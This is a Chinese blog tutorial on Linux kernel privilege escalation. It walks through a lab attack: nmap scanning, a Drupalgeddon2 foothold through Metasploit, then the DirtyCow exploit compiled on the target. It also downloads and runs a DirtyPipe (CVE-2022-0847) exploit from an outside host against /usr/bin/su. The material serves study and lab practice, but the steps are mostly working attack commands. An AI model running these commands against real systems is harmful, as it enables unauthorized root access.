热门标签
热门文章
- 1uni-app 微信小程序tabBar角标或徽标badge不生效 但Android安卓却显示正常_uniapp tabbar不起效
- 2AttributeError: ‘NoneType‘ object has no attribute ‘to_capabilities‘报错_pycharm回放 appium失败attributeerror: 'nonetype' objec
- 3k8s 部署 metribeat 实现 kibana 可视化 es 多集群监控指标_kabana怎么使用 metricbeat 监测
- 4Python库 ALL IN_python all in
- 5软件测试工程师简历要怎么写,才能让HR看到_测试的功能模块很多,如何在简历里体现出来
- 6YOLOv8改进 | 知识蒸馏 | 利用CWDLoss蒸馏提升YOLOv8精度_cwd损失
- 7数据挖掘4:自然语言处理(NLP)信息提取技术_根据自然语言提取数据库字段
- 8布隆过滤器(BloomFilter)的原理及应用_布隆过滤器原理 应用
- 9m4p是什么格式音乐?如何打开 M4P 并将其转换为 MP3?
- 10SnowNLP和jieba库实现中文分词_中文分词可以用jieba和snownlp
当前位置: article > 正文
Linux提权--内核漏洞--web用户提权(脏牛)&本地提权(脏管道)_linux脏牛,内核漏洞提权e
作者:秋刀鱼在做梦 | 2024-07-24 03:03:42
赞
踩
linux脏牛,内核漏洞提权e
免责声明:本文仅做技术交流与学习...
目录
Linux-内核漏洞Web用户提权-探针&利用-脏牛dcow
---上传信息搜集的文件,查找漏洞,利用漏洞,继续上传EXP.
Linux-内核漏洞本地用户提权-探针&利用-DirtyPipe(CVE-2022-0847)
Linux-内核漏洞Web用户提权-探针&利用-脏牛dcow
nmap扫描目标IP及端口
nmap 192.168.46.0/24
nmap -p -65535 192.168.46.144
导入脚本,进行探针
(linux-exploit-suggester--->获取信息...)等等
通过MSF发现目标机器存在脏牛漏洞
- search drupal
-
- use exploit/unix/webapp/drupal_drupalgeddon2
-
- set rhost 192.168.46.144
-
- set rport 1898
-
- run
-
- ---上线
---上传信息搜集的文件,查找漏洞,利用漏洞,继续上传EXP.
- upload /root/dcow.cpp/tmp/dcow.cpp
-
- g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
--密码改了,再用xshell连一下就行了.
Linux-内核漏洞本地用户提权-探针&利用-DirtyPipe(CVE-2022-0847)
前提:
5.8<=Linux kernel<5.16.11/5.15.25/5.10.102
探针:
les.sh
traitor-amd64
beroot.py
--探针出来,找EXP.
利用EXP:
wget https://haxx.in/files/dirtypipez.c
gcc -o dirtypipez dirtypipez.c
./dirtypipez /usr/bin/su #任何具体suid权限的文件均可
id
推荐阅读
相关标签
